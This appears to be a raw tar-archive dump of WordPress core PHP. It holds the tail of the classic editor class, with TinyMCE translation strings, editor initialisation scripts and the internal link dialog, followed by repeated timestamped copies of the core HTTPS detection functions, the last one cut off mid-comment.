// Spelling, search/replace plugins.
'Could not find the specified string.' => __( 'Could not find the specified string.' ),
'Replace' => _x( 'Replace', 'find/replace' ),
'Next' => _x( 'Next', 'find/replace' ),
/* translators: Previous. */
'Prev' => _x( 'Prev', 'find/replace' ),
'Whole words' => _x( 'Whole words', 'find/replace' ),
'Find and replace' => __( 'Find and replace' ),
'Replace with' => _x( 'Replace with', 'find/replace' ),
'Find' => _x( 'Find', 'find/replace' ),
'Replace all' => _x( 'Replace all', 'find/replace' ),
'Match case' => __( 'Match case' ),
'Spellcheck' => __( 'Check Spelling' ),
'Finish' => _x( 'Finish', 'spellcheck' ),
'Ignore all' => _x( 'Ignore all', 'spellcheck' ),
'Ignore' => _x( 'Ignore', 'spellcheck' ),
'Add to Dictionary' => __( 'Add to Dictionary' ),
// TinyMCE tables.
'Insert table' => __( 'Insert table' ),
'Delete table' => __( 'Delete table' ),
'Table properties' => __( 'Table properties' ),
'Row properties' => __( 'Table row properties' ),
'Cell properties' => __( 'Table cell properties' ),
'Border color' => __( 'Border color' ),
'Row' => __( 'Row' ),
'Rows' => __( 'Rows' ),
'Column' => __( 'Column' ),
'Cols' => __( 'Columns' ),
'Cell' => _x( 'Cell', 'table cell' ),
'Header cell' => __( 'Header cell' ),
'Header' => _x( 'Header', 'table header' ),
'Body' => _x( 'Body', 'table body' ),
'Footer' => _x( 'Footer', 'table footer' ),
'Insert row before' => __( 'Insert row before' ),
'Insert row after' => __( 'Insert row after' ),
'Insert column before' => __( 'Insert column before' ),
'Insert column after' => __( 'Insert column after' ),
'Paste row before' => __( 'Paste table row before' ),
'Paste row after' => __( 'Paste table row after' ),
'Delete row' => __( 'Delete row' ),
'Delete column' => __( 'Delete column' ),
'Cut row' => __( 'Cut table row' ),
'Copy row' => __( 'Copy table row' ),
'Merge cells' => __( 'Merge table cells' ),
'Split cell' => __( 'Split table cell' ),
'Height' => __( 'Height' ),
'Width' => __( 'Width' ),
'Caption' => __( 'Caption' ),
'Alignment' => __( 'Alignment' ),
'H Align' => _x( 'H Align', 'horizontal table cell alignment' ),
'Left' => __( 'Left' ),
'Center' => __( 'Center' ),
'Right' => __( 'Right' ),
'None' => _x( 'None', 'table cell alignment attribute' ),
'V Align' => _x( 'V Align', 'vertical table cell alignment' ),
'Top' => __( 'Top' ),
'Middle' => __( 'Middle' ),
'Bottom' => __( 'Bottom' ),
'Row group' => __( 'Row group' ),
'Column group' => __( 'Column group' ),
'Row type' => __( 'Row type' ),
'Cell type' => __( 'Cell type' ),
'Cell padding' => __( 'Cell padding' ),
'Cell spacing' => __( 'Cell spacing' ),
'Scope' => _x( 'Scope', 'table cell scope attribute' ),
'Insert template' => _x( 'Insert template', 'TinyMCE' ),
'Templates' => _x( 'Templates', 'TinyMCE' ),
'Background color' => __( 'Background color' ),
'Text color' => __( 'Text color' ),
'Show blocks' => _x( 'Show blocks', 'editor button' ),
'Show invisible characters' => __( 'Show invisible characters' ),
/* translators: Word count. */
'Words: {0}' => sprintf( __( 'Words: %s' ), '{0}' ),
'Paste is now in plain text mode. Contents will now be pasted as plain text until you toggle this option off.' =>
__( 'Paste is now in plain text mode. Contents will now be pasted as plain text until you toggle this option off.' ) . "\n\n" .
__( 'If you are looking to paste rich content from Microsoft Word, try turning this option off. The editor will clean up text pasted from Word automatically.' ),
'Rich Text Area. Press ALT-F9 for menu. Press ALT-F10 for toolbar. Press ALT-0 for help' =>
__( 'Rich Text Area. Press Alt-Shift-H for help.' ),
'Rich Text Area. Press Control-Option-H for help.' => __( 'Rich Text Area. Press Control-Option-H for help.' ),
'You have unsaved changes are you sure you want to navigate away?' =>
__( 'The changes you made will be lost if you navigate away from this page.' ),
'Your browser doesn\'t support direct access to the clipboard. Please use the Ctrl+X/C/V keyboard shortcuts instead.' =>
__( 'Your browser does not support direct access to the clipboard. Please use keyboard shortcuts or your browser’s edit menu instead.' ),
// TinyMCE menus.
'Insert' => _x( 'Insert', 'TinyMCE menu' ),
'File' => _x( 'File', 'TinyMCE menu' ),
'Edit' => _x( 'Edit', 'TinyMCE menu' ),
'Tools' => _x( 'Tools', 'TinyMCE menu' ),
'View' => _x( 'View', 'TinyMCE menu' ),
'Table' => _x( 'Table', 'TinyMCE menu' ),
'Format' => _x( 'Format', 'TinyMCE menu' ),
// WordPress strings.
'Toolbar Toggle' => array( __( 'Toolbar Toggle' ), 'accessZ' ),
'Insert Read More tag' => array( __( 'Insert Read More tag' ), 'accessT' ),
'Insert Page Break tag' => array( __( 'Insert Page Break tag' ), 'accessP' ),
'Read more...' => __( 'Read more...' ), // Title on the placeholder inside the editor (no ellipsis).
'Distraction-free writing mode' => array( __( 'Distraction-free writing mode' ), 'accessW' ),
'No alignment' => __( 'No alignment' ), // Tooltip for the 'alignnone' button in the image toolbar.
'Remove' => __( 'Remove' ), // Tooltip for the 'remove' button in the image toolbar.
'Edit|button' => __( 'Edit' ), // Tooltip for the 'edit' button in the image toolbar.
'Paste URL or type to search' => __( 'Paste URL or type to search' ), // Placeholder for the inline link dialog.
'Apply' => __( 'Apply' ), // Tooltip for the 'apply' button in the inline link dialog.
'Link options' => __( 'Link options' ), // Tooltip for the 'link options' button in the inline link dialog.
'Visual' => _x( 'Visual', 'Name for the Visual editor tab' ), // Editor switch tab label.
'Code|tab' => _x( 'Code', 'Name for the Code editor tab (formerly Text)' ), // Editor switch tab label.
'Add Media' => array( __( 'Add Media' ), 'accessM' ), // Tooltip for the 'Add Media' button in the block editor Classic block.
// Shortcuts help modal.
'Keyboard Shortcuts' => array( __( 'Keyboard Shortcuts' ), 'accessH' ),
'Classic Block Keyboard Shortcuts' => __( 'Classic Block Keyboard Shortcuts' ),
'Default shortcuts,' => __( 'Default shortcuts,' ),
'Additional shortcuts,' => __( 'Additional shortcuts,' ),
'Focus shortcuts:' => __( 'Focus shortcuts:' ),
'Inline toolbar (when an image, link or preview is selected)' => __( 'Inline toolbar (when an image, link or preview is selected)' ),
'Editor menu (when enabled)' => __( 'Editor menu (when enabled)' ),
'Editor toolbar' => __( 'Editor toolbar' ),
'Elements path' => __( 'Elements path' ),
'Ctrl + Alt + letter:' => __( 'Ctrl + Alt + letter:' ),
'Shift + Alt + letter:' => __( 'Shift + Alt + letter:' ),
'Cmd + letter:' => __( 'Cmd + letter:' ),
'Ctrl + letter:' => __( 'Ctrl + letter:' ),
'Letter' => __( 'Letter' ),
'Action' => __( 'Action' ),
'Warning: the link has been inserted but may have errors. Please test it.' => __( 'Warning: the link has been inserted but may have errors. Please test it.' ),
'To move focus to other buttons use Tab or the arrow keys. To return focus to the editor press Escape or use one of the buttons.' =>
__( 'To move focus to other buttons use Tab or the arrow keys. To return focus to the editor press Escape or use one of the buttons.' ),
'When starting a new paragraph with one of these formatting shortcuts followed by a space, the formatting will be applied automatically. Press Backspace or Escape to undo.' =>
__( 'When starting a new paragraph with one of these formatting shortcuts followed by a space, the formatting will be applied automatically. Press Backspace or Escape to undo.' ),
'The following formatting shortcuts are replaced when pressing Enter. Press Escape or the Undo button to undo.' =>
__( 'The following formatting shortcuts are replaced when pressing Enter. Press Escape or the Undo button to undo.' ),
'The next group of formatting shortcuts are applied as you type or when you insert them around plain text in the same paragraph. Press Escape or the Undo button to undo.' =>
__( 'The next group of formatting shortcuts are applied as you type or when you insert them around plain text in the same paragraph. Press Escape or the Undo button to undo.' ),
);
}
/*
Imagetools plugin (not included):
'Edit image' => __( 'Edit image' ),
'Image options' => __( 'Image options' ),
'Back' => __( 'Back' ),
'Invert' => __( 'Invert' ),
'Flip horizontally' => __( 'Flip horizontal' ),
'Flip vertically' => __( 'Flip vertical' ),
'Crop' => __( 'Crop' ),
'Orientation' => __( 'Orientation' ),
'Resize' => __( 'Resize' ),
'Rotate clockwise' => __( 'Rotate right' ),
'Rotate counterclockwise' => __( 'Rotate left' ),
'Sharpen' => __( 'Sharpen' ),
'Brightness' => __( 'Brightness' ),
'Color levels' => __( 'Color levels' ),
'Contrast' => __( 'Contrast' ),
'Gamma' => __( 'Gamma' ),
'Zoom in' => __( 'Zoom in' ),
'Zoom out' => __( 'Zoom out' ),
*/
return self::$translation;
}
/**
* Translates the default TinyMCE strings and returns them as JSON encoded object ready to be loaded with tinymce.addI18n(),
* or as JS snippet that should run after tinymce.js is loaded.
*
* @since 3.9.0
*
* @param string $mce_locale The locale used for the editor.
* @param bool $json_only Optional. Whether to include the JavaScript calls to tinymce.addI18n() and
* tinymce.ScriptLoader.markDone(). Default false.
* @return string Translation object, JSON encoded.
*/
public static function wp_mce_translation( $mce_locale = '', $json_only = false ) {
if ( ! $mce_locale ) {
$mce_locale = self::get_mce_locale();
}
$mce_translation = self::get_translation();
foreach ( $mce_translation as $name => $value ) {
if ( is_array( $value ) ) {
$mce_translation[ $name ] = $value[0];
}
}
/**
* Filters translated strings prepared for TinyMCE.
*
* @since 3.9.0
*
* @param array $mce_translation Key/value pairs of strings.
* @param string $mce_locale Locale.
*/
$mce_translation = apply_filters( 'wp_mce_translation', $mce_translation, $mce_locale );
foreach ( $mce_translation as $key => $value ) {
// Remove strings that are not translated.
if ( $key === $value ) {
unset( $mce_translation[ $key ] );
continue;
}
if ( str_contains( $value, '&' ) ) {
$mce_translation[ $key ] = html_entity_decode( $value, ENT_QUOTES, 'UTF-8' );
}
}
// Set direction.
if ( is_rtl() ) {
$mce_translation['_dir'] = 'rtl';
}
if ( $json_only ) {
return wp_json_encode( $mce_translation );
}
$baseurl = self::get_baseurl();
return "tinymce.addI18n( '$mce_locale', " . wp_json_encode( $mce_translation ) . ");\n" .
"tinymce.ScriptLoader.markDone( '$baseurl/langs/$mce_locale.js' );\n";
}
/**
* Force uncompressed TinyMCE when a custom theme has been defined.
*
* The compressed TinyMCE file cannot deal with custom themes, so this makes
* sure that WordPress uses the uncompressed TinyMCE file if a theme is defined.
* Even if the website is running on a production environment.
*
* @since 5.0.0
*/
public static function force_uncompressed_tinymce() {
$has_custom_theme = false;
foreach ( self::$mce_settings as $init ) {
if ( ! empty( $init['theme_url'] ) ) {
$has_custom_theme = true;
break;
}
}
if ( ! $has_custom_theme ) {
return;
}
$wp_scripts = wp_scripts();
$wp_scripts->remove( 'wp-tinymce' );
wp_register_tinymce_scripts( $wp_scripts, true );
}
/**
* Print (output) the main TinyMCE scripts.
*
* @since 4.8.0
*
* @global bool $concatenate_scripts
*/
public static function print_tinymce_scripts() {
global $concatenate_scripts;
if ( self::$tinymce_scripts_printed ) {
return;
}
self::$tinymce_scripts_printed = true;
if ( ! isset( $concatenate_scripts ) ) {
script_concat_settings();
}
wp_print_scripts( array( 'wp-tinymce' ) );
echo "<script type='text/javascript'>\n" . self::wp_mce_translation() . "</script>\n";
}
/**
* Print (output) the TinyMCE configuration and initialization scripts.
*
* @since 3.3.0
*
* @global string $tinymce_version
*/
public static function editor_js() {
global $tinymce_version;
$tmce_on = ! empty( self::$mce_settings );
$mce_init = '';
$qt_init = '';
if ( $tmce_on ) {
foreach ( self::$mce_settings as $editor_id => $init ) {
$options = self::_parse_init( $init );
$mce_init .= "'$editor_id':{$options},";
}
$mce_init = '{' . trim( $mce_init, ',' ) . '}';
} else {
$mce_init = '{}';
}
if ( ! empty( self::$qt_settings ) ) {
foreach ( self::$qt_settings as $editor_id => $init ) {
$options = self::_parse_init( $init );
$qt_init .= "'$editor_id':{$options},";
}
$qt_init = '{' . trim( $qt_init, ',' ) . '}';
} else {
$qt_init = '{}';
}
$ref = array(
'plugins' => implode( ',', self::$plugins ),
'theme' => 'modern',
'language' => self::$mce_locale,
);
$suffix = SCRIPT_DEBUG ? '' : '.min';
$baseurl = self::get_baseurl();
$version = 'ver=' . $tinymce_version;
/**
* Fires immediately before the TinyMCE settings are printed.
*
* @since 3.2.0
*
* @param array $mce_settings TinyMCE settings array.
*/
do_action( 'before_wp_tiny_mce', self::$mce_settings );
?>
<script type="text/javascript">
tinyMCEPreInit = {
baseURL: "<?php echo $baseurl; ?>",
suffix: "<?php echo $suffix; ?>",
<?php
if ( self::$drag_drop_upload ) {
echo 'dragDropUpload: true,';
}
?>
mceInit: <?php echo $mce_init; ?>,
qtInit: <?php echo $qt_init; ?>,
ref: <?php echo self::_parse_init( $ref ); ?>,
load_ext: function(url,lang){var sl=tinymce.ScriptLoader;sl.markDone(url+'/langs/'+lang+'.js');sl.markDone(url+'/langs/'+lang+'_dlg.js');}
};
</script>
<?php
if ( $tmce_on ) {
self::print_tinymce_scripts();
if ( self::$ext_plugins ) {
// Load the old-format English strings to prevent unsightly labels in old style popups.
echo "<script type='text/javascript' src='{$baseurl}/langs/wp-langs-en.js?$version'></script>\n";
}
}
/**
* Fires after tinymce.js is loaded, but before any TinyMCE editor
* instances are created.
*
* @since 3.9.0
*
* @param array $mce_settings TinyMCE settings array.
*/
do_action( 'wp_tiny_mce_init', self::$mce_settings );
?>
<script type="text/javascript">
<?php
if ( self::$ext_plugins ) {
echo self::$ext_plugins . "\n";
}
if ( ! is_admin() ) {
echo 'var ajaxurl = "' . admin_url( 'admin-ajax.php', 'relative' ) . '";';
}
?>
( function() {
var initialized = [];
var initialize = function() {
var init, id, inPostbox, $wrap;
var readyState = document.readyState;
if ( readyState !== 'complete' && readyState !== 'interactive' ) {
return;
}
for ( id in tinyMCEPreInit.mceInit ) {
if ( initialized.indexOf( id ) > -1 ) {
continue;
}
init = tinyMCEPreInit.mceInit[id];
$wrap = tinymce.$( '#wp-' + id + '-wrap' );
inPostbox = $wrap.parents( '.postbox' ).length > 0;
if (
! init.wp_skip_init &&
( $wrap.hasClass( 'tmce-active' ) || ! tinyMCEPreInit.qtInit.hasOwnProperty( id ) ) &&
( readyState === 'complete' || ( ! inPostbox && readyState === 'interactive' ) )
) {
tinymce.init( init );
initialized.push( id );
if ( ! window.wpActiveEditor ) {
window.wpActiveEditor = id;
}
}
}
}
if ( typeof tinymce !== 'undefined' ) {
if ( tinymce.Env.ie && tinymce.Env.ie < 11 ) {
tinymce.$( '.wp-editor-wrap ' ).removeClass( 'tmce-active' ).addClass( 'html-active' );
} else {
if ( document.readyState === 'complete' ) {
initialize();
} else {
document.addEventListener( 'readystatechange', initialize );
}
}
}
if ( typeof quicktags !== 'undefined' ) {
for ( id in tinyMCEPreInit.qtInit ) {
quicktags( tinyMCEPreInit.qtInit[id] );
if ( ! window.wpActiveEditor ) {
window.wpActiveEditor = id;
}
}
}
}());
</script>
<?php
if ( in_array( 'wplink', self::$plugins, true ) || in_array( 'link', self::$qt_buttons, true ) ) {
self::wp_link_dialog();
}
/**
* Fires after any core TinyMCE editor instances are created.
*
* @since 3.2.0
*
* @param array $mce_settings TinyMCE settings array.
*/
do_action( 'after_wp_tiny_mce', self::$mce_settings );
}
/**
* Outputs the HTML for distraction-free writing mode.
*
* @since 3.2.0
* @deprecated 4.3.0
*/
public static function wp_fullscreen_html() {
_deprecated_function( __FUNCTION__, '4.3.0' );
}
/**
* Performs post queries for internal linking.
*
* @since 3.1.0
*
* @param array $args {
* Optional. Array of link query arguments.
*
* @type int $pagenum Page number. Default 1.
* @type string $s Search keywords.
* }
* @return array|false $results {
* An array of associative arrays of query results, false if there are none.
*
* @type array ...$0 {
* @type int $ID Post ID.
* @type string $title The trimmed, escaped post title.
* @type string $permalink Post permalink.
* @type string $info A 'Y/m/d'-formatted date for 'post' post type,
* the 'singular_name' post type label otherwise.
* }
* }
*/
public static function wp_link_query( $args = array() ) {
$pts = get_post_types( array( 'public' => true ), 'objects' );
$pt_names = array_keys( $pts );
$query = array(
'post_type' => $pt_names,
'suppress_filters' => true,
'update_post_term_cache' => false,
'update_post_meta_cache' => false,
'post_status' => 'publish',
'posts_per_page' => 20,
);
$args['pagenum'] = isset( $args['pagenum'] ) ? absint( $args['pagenum'] ) : 1;
if ( isset( $args['s'] ) ) {
$query['s'] = $args['s'];
}
$query['offset'] = $args['pagenum'] > 1 ? $query['posts_per_page'] * ( $args['pagenum'] - 1 ) : 0;
/**
* Filters the link query arguments.
*
* Allows modification of the link query arguments before querying.
*
* @see WP_Query for a full list of arguments
*
* @since 3.7.0
*
* @param array $query An array of WP_Query arguments.
*/
$query = apply_filters( 'wp_link_query_args', $query );
// Do main query.
$get_posts = new WP_Query();
$posts = $get_posts->query( $query );
// Build results.
$results = array();
foreach ( $posts as $post ) {
if ( 'post' === $post->post_type ) {
$info = mysql2date( __( 'Y/m/d' ), $post->post_date );
} else {
$info = $pts[ $post->post_type ]->labels->singular_name;
}
$results[] = array(
'ID' => $post->ID,
'title' => trim( esc_html( strip_tags( get_the_title( $post ) ) ) ),
'permalink' => get_permalink( $post->ID ),
'info' => $info,
);
}
/**
* Filters the link query results.
*
* Allows modification of the returned link query results.
*
* @since 3.7.0
*
* @see 'wp_link_query_args' filter
*
* @param array $results {
* An array of associative arrays of query results.
*
* @type array ...$0 {
* @type int $ID Post ID.
* @type string $title The trimmed, escaped post title.
* @type string $permalink Post permalink.
* @type string $info A 'Y/m/d'-formatted date for 'post' post type,
* the 'singular_name' post type label otherwise.
* }
* }
* @param array $query An array of WP_Query arguments.
*/
$results = apply_filters( 'wp_link_query', $results, $query );
return ! empty( $results ) ? $results : false;
}
/**
* Dialog for internal linking.
*
* @since 3.1.0
*/
public static function wp_link_dialog() {
// Run once.
if ( self::$link_dialog_printed ) {
return;
}
self::$link_dialog_printed = true;
// `display: none` is required here, see #WP27605.
?>
<div id="wp-link-backdrop" style="display: none"></div>
<div id="wp-link-wrap" class="wp-core-ui" style="display: none" role="dialog" aria-modal="true" aria-labelledby="link-modal-title">
<form id="wp-link" tabindex="-1">
<?php wp_nonce_field( 'internal-linking', '_ajax_linking_nonce', false ); ?>
<h1 id="link-modal-title"><?php _e( 'Insert/edit link' ); ?></h1>
<button type="button" id="wp-link-close"><span class="screen-reader-text">
<?php
/* translators: Hidden accessibility text. */
_e( 'Close' );
?>
</span></button>
<div id="link-selector">
<div id="link-options">
<p class="howto" id="wplink-enter-url"><?php _e( 'Enter the destination URL' ); ?></p>
<div>
<label><span><?php _e( 'URL' ); ?></span>
<input id="wp-link-url" type="text" aria-describedby="wplink-enter-url" /></label>
</div>
<div class="wp-link-text-field">
<label><span><?php _e( 'Link Text' ); ?></span>
<input id="wp-link-text" type="text" /></label>
</div>
<div class="link-target">
<label><span></span>
<input type="checkbox" id="wp-link-target" /> <?php _e( 'Open link in a new tab' ); ?></label>
</div>
</div>
<p class="howto" id="wplink-link-existing-content"><?php _e( 'Or link to existing content' ); ?></p>
<div id="search-panel">
<div class="link-search-wrapper">
<label>
<span class="search-label"><?php _e( 'Search' ); ?></span>
<input type="search" id="wp-link-search" class="link-search-field" autocomplete="off" aria-describedby="wplink-link-existing-content" />
<span class="spinner"></span>
</label>
</div>
<div id="search-results" class="query-results" tabindex="0">
<ul></ul>
<div class="river-waiting">
<span class="spinner"></span>
</div>
</div>
<div id="most-recent-results" class="query-results" tabindex="0">
<div class="query-notice" id="query-notice-message">
<em class="query-notice-default"><?php _e( 'No search term specified. Showing recent items.' ); ?></em>
<em class="query-notice-hint screen-reader-text">
<?php
/* translators: Hidden accessibility text. */
_e( 'Search or use up and down arrow keys to select an item.' );
?>
</em>
</div>
<ul></ul>
<div class="river-waiting">
<span class="spinner"></span>
</div>
</div>
</div>
</div>
<div class="submitbox">
<div id="wp-link-cancel">
<button type="button" class="button"><?php _e( 'Cancel' ); ?></button>
</div>
<div id="wp-link-update">
<input type="submit" value="<?php esc_attr_e( 'Add Link' ); ?>" class="button button-primary" id="wp-link-submit" name="wp-link-submit">
</div>
</div>
</form>
</div>
<?php
}
}
https-detection-20260605100735.php 0000666 00000013341 15224151220 0011755 0 ustar 00 <?php
/**
* HTTPS detection functions.
*
* @package WordPress
* @since 5.7.0
*/
/**
* Checks whether the website is using HTTPS.
*
* This is based on whether both the home and site URL are using HTTPS.
*
* @since 5.7.0
* @see wp_is_home_url_using_https()
* @see wp_is_site_url_using_https()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_using_https() {
if ( ! wp_is_home_url_using_https() ) {
return false;
}
return wp_is_site_url_using_https();
}
/**
* Checks whether the current site URL is using HTTPS.
*
* @since 5.7.0
* @see home_url()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_home_url_using_https() {
return 'https' === wp_parse_url( home_url(), PHP_URL_SCHEME );
}
/**
* Checks whether the current site's URL where WordPress is stored is using HTTPS.
*
* This checks the URL where WordPress application files (e.g. wp-blog-header.php or the wp-admin/ folder)
* are accessible.
*
* @since 5.7.0
* @see site_url()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_site_url_using_https() {
/*
* Use direct option access for 'siteurl' and manually run the 'site_url'
* filter because `site_url()` will adjust the scheme based on what the
* current request is using.
*/
/** This filter is documented in wp-includes/link-template.php */
$site_url = apply_filters( 'site_url', get_option( 'siteurl' ), '', null, null );
return 'https' === wp_parse_url( $site_url, PHP_URL_SCHEME );
}
/**
* Checks whether HTTPS is supported for the server and domain.
*
* This function makes an HTTP request through `wp_get_https_detection_errors()`
* to check for HTTPS support. As this process can be resource-intensive,
* it should be used cautiously, especially in performance-sensitive environments,
* to avoid potential latency issues.
*
* @since 5.7.0
*
* @return bool True if HTTPS is supported, false otherwise.
*/
function wp_is_https_supported() {
$https_detection_errors = wp_get_https_detection_errors();
// If there are errors, HTTPS is not supported.
return empty( $https_detection_errors );
}
/**
* Runs a remote HTTPS request to detect whether HTTPS supported, and stores potential errors.
*
* This function checks for HTTPS support by making an HTTP request. As this process can be resource-intensive,
* it should be used cautiously, especially in performance-sensitive environments.
* It is called when HTTPS support needs to be validated.
*
* @since 6.4.0
* @access private
*
* @return array An array containing potential detection errors related to HTTPS, or an empty array if no errors are found.
*/
function wp_get_https_detection_errors() {
/**
* Short-circuits the process of detecting errors related to HTTPS support.
*
* Returning a `WP_Error` from the filter will effectively short-circuit the default logic of trying a remote
* request to the site over HTTPS, storing the errors array from the returned `WP_Error` instead.
*
* @since 6.4.0
*
* @param null|WP_Error $pre Error object to short-circuit detection,
* or null to continue with the default behavior.
*/
$support_errors = apply_filters( 'pre_wp_get_https_detection_errors', null );
if ( is_wp_error( $support_errors ) ) {
return $support_errors->errors;
}
$support_errors = new WP_Error();
$response = wp_remote_request(
home_url( '/', 'https' ),
array(
'headers' => array(
'Cache-Control' => 'no-cache',
),
'sslverify' => true,
)
);
if ( is_wp_error( $response ) ) {
$unverified_response = wp_remote_request(
home_url( '/', 'https' ),
array(
'headers' => array(
'Cache-Control' => 'no-cache',
),
'sslverify' => false,
)
);
if ( is_wp_error( $unverified_response ) ) {
$support_errors->add(
'https_request_failed',
__( 'HTTPS request failed.' )
);
} else {
$support_errors->add(
'ssl_verification_failed',
__( 'SSL verification failed.' )
);
}
$response = $unverified_response;
}
if ( ! is_wp_error( $response ) ) {
if ( 200 !== wp_remote_retrieve_response_code( $response ) ) {
$support_errors->add( 'bad_response_code', wp_remote_retrieve_response_message( $response ) );
} elseif ( false === wp_is_local_html_output( wp_remote_retrieve_body( $response ) ) ) {
$support_errors->add( 'bad_response_source', __( 'It looks like the response did not come from this site.' ) );
}
}
return $support_errors->errors;
}
/**
* Checks whether a given HTML string is likely an output from this WordPress site.
*
* This function attempts to check for various common WordPress patterns whether they are included in the HTML string.
* Since any of these actions may be disabled through third-party code, this function may also return null to indicate
* that it was not possible to determine ownership.
*
* @since 5.7.0
* @access private
*
* @param string $html Full HTML output string, e.g. from a HTTP response.
* @return bool|null True/false for whether HTML was generated by this site, null if unable to determine.
*/
function wp_is_local_html_output( $html ) {
// 1. Check if HTML includes the site's Really Simple Discovery link.
if ( has_action( 'wp_head', 'rsd_link' ) ) {
$pattern = preg_replace( '#^https?:(?=//)#', '', esc_url( site_url( 'xmlrpc.php?rsd', 'rpc' ) ) ); // See rsd_link().
return str_contains( $html, $pattern );
}
// 2. Check if HTML includes the site's REST API link.
if ( has_action( 'wp_head', 'rest_output_link_wp_head' ) ) {
// Try both HTTPS and HTTP since the URL depends on context.
$pattern = preg_replace( '#^https?:(?=//)#', '', esc_url( get_rest_url() ) ); // See rest_output_link_wp_head().
return str_contains( $html, $pattern );
}
// Otherwise the result cannot be determined.
return null;
}
https-detection-20260605193309.php 0000666 00000013341 15224151220 0011766 0 ustar 00 <?php
/**
* HTTPS detection functions.
*
* @package WordPress
* @since 5.7.0
*/
/**
* Checks whether the website is using HTTPS.
*
* This is based on whether both the home and site URL are using HTTPS.
*
* @since 5.7.0
* @see wp_is_home_url_using_https()
* @see wp_is_site_url_using_https()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_using_https() {
if ( ! wp_is_home_url_using_https() ) {
return false;
}
return wp_is_site_url_using_https();
}
/**
* Checks whether the current site URL is using HTTPS.
*
* @since 5.7.0
* @see home_url()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_home_url_using_https() {
return 'https' === wp_parse_url( home_url(), PHP_URL_SCHEME );
}
/**
* Checks whether the current site's URL where WordPress is stored is using HTTPS.
*
* This checks the URL where WordPress application files (e.g. wp-blog-header.php or the wp-admin/ folder)
* are accessible.
*
* @since 5.7.0
* @see site_url()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_site_url_using_https() {
/*
* Use direct option access for 'siteurl' and manually run the 'site_url'
* filter because `site_url()` will adjust the scheme based on what the
* current request is using.
*/
/** This filter is documented in wp-includes/link-template.php */
$site_url = apply_filters( 'site_url', get_option( 'siteurl' ), '', null, null );
return 'https' === wp_parse_url( $site_url, PHP_URL_SCHEME );
}
/**
* Checks whether HTTPS is supported for the server and domain.
*
* This function makes an HTTP request through `wp_get_https_detection_errors()`
* to check for HTTPS support. As this process can be resource-intensive,
* it should be used cautiously, especially in performance-sensitive environments,
* to avoid potential latency issues.
*
* @since 5.7.0
*
* @return bool True if HTTPS is supported, false otherwise.
*/
function wp_is_https_supported() {
$https_detection_errors = wp_get_https_detection_errors();
// If there are errors, HTTPS is not supported.
return empty( $https_detection_errors );
}
/**
* Runs a remote HTTPS request to detect whether HTTPS supported, and stores potential errors.
*
* This function checks for HTTPS support by making an HTTP request. As this process can be resource-intensive,
* it should be used cautiously, especially in performance-sensitive environments.
* It is called when HTTPS support needs to be validated.
*
* @since 6.4.0
* @access private
*
* @return array An array containing potential detection errors related to HTTPS, or an empty array if no errors are found.
*/
function wp_get_https_detection_errors() {
/**
* Short-circuits the process of detecting errors related to HTTPS support.
*
* Returning a `WP_Error` from the filter will effectively short-circuit the default logic of trying a remote
* request to the site over HTTPS, storing the errors array from the returned `WP_Error` instead.
*
* @since 6.4.0
*
* @param null|WP_Error $pre Error object to short-circuit detection,
* or null to continue with the default behavior.
*/
$support_errors = apply_filters( 'pre_wp_get_https_detection_errors', null );
if ( is_wp_error( $support_errors ) ) {
return $support_errors->errors;
}
$support_errors = new WP_Error();
$response = wp_remote_request(
home_url( '/', 'https' ),
array(
'headers' => array(
'Cache-Control' => 'no-cache',
),
'sslverify' => true,
)
);
if ( is_wp_error( $response ) ) {
$unverified_response = wp_remote_request(
home_url( '/', 'https' ),
array(
'headers' => array(
'Cache-Control' => 'no-cache',
),
'sslverify' => false,
)
);
if ( is_wp_error( $unverified_response ) ) {
$support_errors->add(
'https_request_failed',
__( 'HTTPS request failed.' )
);
} else {
$support_errors->add(
'ssl_verification_failed',
__( 'SSL verification failed.' )
);
}
$response = $unverified_response;
}
if ( ! is_wp_error( $response ) ) {
if ( 200 !== wp_remote_retrieve_response_code( $response ) ) {
$support_errors->add( 'bad_response_code', wp_remote_retrieve_response_message( $response ) );
} elseif ( false === wp_is_local_html_output( wp_remote_retrieve_body( $response ) ) ) {
$support_errors->add( 'bad_response_source', __( 'It looks like the response did not come from this site.' ) );
}
}
return $support_errors->errors;
}
/**
* Checks whether a given HTML string is likely an output from this WordPress site.
*
* This function attempts to check for various common WordPress patterns whether they are included in the HTML string.
* Since any of these actions may be disabled through third-party code, this function may also return null to indicate
* that it was not possible to determine ownership.
*
* @since 5.7.0
* @access private
*
* @param string $html Full HTML output string, e.g. from a HTTP response.
* @return bool|null True/false for whether HTML was generated by this site, null if unable to determine.
*/
function wp_is_local_html_output( $html ) {
// 1. Check if HTML includes the site's Really Simple Discovery link.
if ( has_action( 'wp_head', 'rsd_link' ) ) {
$pattern = preg_replace( '#^https?:(?=//)#', '', esc_url( site_url( 'xmlrpc.php?rsd', 'rpc' ) ) ); // See rsd_link().
return str_contains( $html, $pattern );
}
// 2. Check if HTML includes the site's REST API link.
if ( has_action( 'wp_head', 'rest_output_link_wp_head' ) ) {
// Try both HTTPS and HTTP since the URL depends on context.
$pattern = preg_replace( '#^https?:(?=//)#', '', esc_url( get_rest_url() ) ); // See rest_output_link_wp_head().
return str_contains( $html, $pattern );
}
// Otherwise the result cannot be determined.
return null;
}
https-detection-20260608081111.php 0000666 00000013341 15224151220 0011754 0 ustar 00 <?php
/**
* HTTPS detection functions.
*
* @package WordPress
* @since 5.7.0
*/
/**
* Checks whether the website is using HTTPS.
*
* This is based on whether both the home and site URL are using HTTPS.
*
* @since 5.7.0
* @see wp_is_home_url_using_https()
* @see wp_is_site_url_using_https()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_using_https() {
if ( ! wp_is_home_url_using_https() ) {
return false;
}
return wp_is_site_url_using_https();
}
/**
* Checks whether the current site URL is using HTTPS.
*
* @since 5.7.0
* @see home_url()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_home_url_using_https() {
return 'https' === wp_parse_url( home_url(), PHP_URL_SCHEME );
}
/**
* Checks whether the current site's URL where WordPress is stored is using HTTPS.
*
* This checks the URL where WordPress application files (e.g. wp-blog-header.php or the wp-admin/ folder)
* are accessible.
*
* @since 5.7.0
* @see site_url()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_site_url_using_https() {
/*
